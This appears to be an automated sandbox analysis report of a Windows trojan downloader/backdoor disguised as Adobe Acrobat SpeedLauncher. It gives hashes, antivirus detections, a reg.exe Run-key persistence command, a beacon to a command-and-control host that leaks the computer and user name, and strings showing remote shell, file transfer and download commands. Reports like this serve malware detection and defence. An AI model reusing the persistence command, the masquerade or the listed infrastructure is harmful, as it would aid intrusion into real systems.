Analysis Date2014-01-03 11:04:30
MD536c0d3f109aede4d76b05431f8a64f9e
SHA1f60973d256757c057b5e40ae0a5631ad314ab981

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 0fe9ed26ee8dac2ad66f17fe931e5cc4 sha1: 569a2df945e22f828a868388e0623aafe89122f7 size: 9728
Section.rdata md5: 7df1e22dadbdcf85ea4f531e5aa7147e sha1: 82afd757494f7bf09292f2f0e6cda5e20e72580f size: 3072
Section.data md5: b9277061e5492acfb00af0a376231807 sha1: 574362a41a65042137f6ebc0c3f2ea2cdead3b16 size: 2560
Section.rsrc md5: 9721dcc7e94f7acf151c715cd34476f4 sha1: 824b27c0ee844c7b06592beed30ac3c561db1cf3 size: 1024
Timestamp2009-02-05 07:14:01
VersionLegalCopyright: Copyright Adobe Systems Incorporated 2004
FileVersion: 8, 0, 0, 0
CompanyName: Adobe Systems Incorporated
Comments:
ProductName: Adobe Acrobat
ProductVersion: 8, 0, 0, 0
FileDescription: Adobe Acrobat SpeedLauncher
OriginalFilename: AcroSpeedLaunch.exe
PackerMicrosoft Visual C++ v6.0
PEhash9cdb7e791d9adb73e14aee04eea88c3006d3c666
AVavgGeneric14.HE
AVclamavTrojan.Downloader-74679
AVmcafeeRDN/Downloader.a!bi

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\reader_sl.exe
Creates Processreg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Adobe Reader Speed Launcher /d C:\Documents and Settings\Administrator\Application Data\Adobe\reader_sl.exe /f
Creates MutexGLOBAL\ADR32
Winsock URLhttp://japan.yahoodaily.com/index.html

Process
↳ reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Adobe Reader Speed Launcher /d C:\Documents and Settings\Administrator\Application Data\Adobe\reader_sl.exe /f

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Adobe Reader Speed Launcher ➝
C:\Documents and Settings\Administrator\Application Data\Adobe\reader_sl.exe\\x00

Network Details:

DNSjapan.yahoodaily.com
Type: A
96.43.141.186
HTTP GEThttp://japan.yahoodaily.com/index.html
User-Agent: 5.1 02:14 COMPUTER-XXXXXX\Administrator
Flows TCP192.168.1.1:1031 ➝ 96.43.141.186:80

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e68 746d6c20   GET /index.html 
0x00000010 (00016)   48545450 2f312e31 0d0a5573 65722d41   HTTP/1.1..User-A
0x00000020 (00032)   67656e74 3a20352e 31203032 3a313420   gent: 5.1 02:14 
0x00000030 (00048)   434f4d50 55544552 2d585858 5858585c   COMPUTER-XXXXXX\
0x00000040 (00064)   41646d69 6e697374 7261746f 720d0a48   Administrator..H
0x00000050 (00080)   6f73743a 206a6170 616e2e79 61686f6f   ost: japan.yahoo
0x00000060 (00096)   6461696c 792e636f 6d0d0a43 61636865   daily.com..Cache
0x00000070 (00112)   2d436f6e 74726f6c 3a206e6f 2d636163   -Control: no-cac
0x00000080 (00128)   68650d0a 0d0a                         he....


Strings
040904e4
8, 0, 0, 0
AcroSpeedLaunch.exe
Adobe Acrobat
Adobe Acrobat SpeedLauncher
Adobe Systems Incorporated
Comments
CompanyName
Copyright Adobe Systems Incorporated 2004
FileDescription
FileVersion
LegalCopyright
OriginalFilename
ProductName
ProductVersion
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
090205
%-24s %s
%-26s %5d
??2@YAPAXI@Z
??3@YAXPAX@Z
Accept:*/*
_acmdln
add "HKCU\%s" /v "%s" /d "%s" /f
_adjust_fdiv
Adobe Reader Speed Launcher
ADVAPI32.dll
AllocConsole
 and the PID is %d
\Application Data\Adobe\reader_sl.exe
border=
Cache-Control:max-age=0
Cache-Control:no-cache
CD-ROM		
CloseHandle
CloseServiceHandle
\cmd.exe
CmdPath=
Computer:
%ComSpec%
CONIN$
Content-Length: %d
_controlfp
ControlService
ControlService failed!
CopyFileA
CreateDirectoryA
Create failed with %d!
CreateFileA
CreateMutexA
CreatePipe
CreateProcessA
CreateProcessAsUserA
CreateProcess failed!
CreateThread
CreateToolhelp32Snapshot
__CxxFrameHandler
@.data
%d.%d %02d:%02d %s\%s
_EH_prolog
EnumServicesStatusExA
_except_handler3
ExitProcess
ExpandEnvironmentStringsA
Failed!
FileSize:	%d
Fixed		
GetComputerNameA
GetConsoleDisplayMode
GetCurrentProcess
GetDriveTypeA
GetExitCodeProcess
GetFileAttributesA
GetFileAttributes Error code: %d
GetFileSize
GetLastError
GetLocalTime
GetLogicalDrives
__getmainargs
GetModuleFileNameA
GetModuleHandleA
GetStartupInfoA
GetSystemDirectoryA
geturl
GetUserNameA
GetUserNameExA
GetUserProfileDirectoryA
GetVersionExA
GetVolumeInformationA
GetWindowsDirectoryA
GLOBAL\ADR32
<h1>Bad Request (Invalid Hostname)</h1>
HttpAddRequestHeadersA
HttpOpenRequestA
HttpSendRequestA
IE 8.5
_initterm
InternetCloseHandle
InternetConnectA
InternetOpenA
InternetOpenUrlA
InternetQueryOptionA
InternetReadFile
InternetSetOptionA
Invalid		
KERNEL32.dll
list process failed!
list service failed!
lstrcatA
lstrlenA
memcpy
memset
Mozilla/5.0
~MS80547.bat
MSVCRT.dll
OpenP failed with %d!
OpenProcess
OpenProcessToken
OpenSCManagerA
OpenSCManager failed!
OpenServiceA
OpenService failed!
OpenT failed with %d!
__p__commode
PeekNamedPipe
__p__fmode
pidrun
Pragma:no-cache
Process32First
Process32Next
Process cmd.exe exited!
Program started!
Proxy-Connection:Keep-Alive
PVVj VV
PVVVWV
PVVVWVV
Ramdisk		
`.rdata
ReadFile
RegCloseKey
RegCreateKeyExA
RegDeleteValueA
reg.exe
Remote		
Removeable		
%*[^/]%*[/]%*[^/]%s
%s Connected!
Secur32.dll
Service does not exist!
Service doesn't start!
Service is running already!
Service started!
Service still running!
Service stopped!
Service stop pending!
__set_app_type
SetCurrentDirectoryA
SetStdHandle
__setusermatherr
SHELL32.dll
ShellExecuteA
Shell started fail!
Shell started successfully!
Shell started,wait to terminate it.....
Sleep Time:
Software\Microsoft\Windows\CurrentVersion\Run
So long!
sprintf
sscanf
SSSh<W@
SSSVSS
Started already,
StartServiceA
StartService failed!
Start shell first.
strcat
strchr
_strcmpi
strcpy
strlen
_strnicmp
strrchr
strstr
Syntax error!
Syntax error!	Usage:	getf/putf FileName <N>
Syntax error!	Usage:	GetUrl URL FileName
Syntax error!	Usage:	kill </p|/s> <pid|ServiceName>
Syntax error!	Usage:	list </p|/s|/d>
Syntax error!	Usage:	start </p|/s> <filename|ServiceName>
t0V<#u
t4j SV3
\tasks
TerminateProcess
!This program cannot be run in DOS mode.
t<Ht2Ht(Ht
t:h(U@
Totally %d volumes found.
Unkown		
URLDownloadToFileA
urlmon.dll
USERENV.dll
Volume on this computer:
Volume	Type		Volume Name
W95hX@
WaitForSingleObject
whoami
width=
WININET.dll
WPh@R@
WriteConsoleInputA
WriteFile
_XcptFilter
Yt7@PV
YtEj/U
YYSSSSS
YYSSSVSS
YYSSVUS
YYt5j\
YYWWVh50@
YYWWVhp/@
ZbRich